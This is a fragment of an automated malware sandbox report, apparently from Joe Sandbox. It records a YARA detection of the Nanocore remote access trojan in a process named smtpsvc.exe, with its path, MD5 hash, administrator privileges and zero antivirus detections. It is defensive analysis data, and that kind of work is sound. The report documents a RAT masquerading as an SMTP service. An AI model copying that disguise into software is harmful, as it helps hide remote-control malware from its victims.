                                                              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000002.2364705666.0000000000500000.00000004.00000001.sdmp, Author: Joe Security
                                                              Reputation:moderate

                                                              General

                                                              Start time:11:43:31
                                                              Start date:09/04/2021
                                                              Path:C:\Program Files (x86)\SMTP Service\smtpsvc.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:'C:\Program Files (x86)\SMTP Service\smtpsvc.exe'
                                                              Imagebase:0x110000
                                                              File size:45216 bytes
                                                              MD5 hash:62CE5EF995FD63A1847A196C2E8B267B
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:.Net C# or VB.NET
                                                              Antivirus matches:
                                                              • Detection: 0%, Metadefender, Browse
                                                              • Detection: 0%, ReversingLabs
                                                              Reputation:moderate

                                                              Disassembly

                                                              Code Analysis

                                                              Reset < >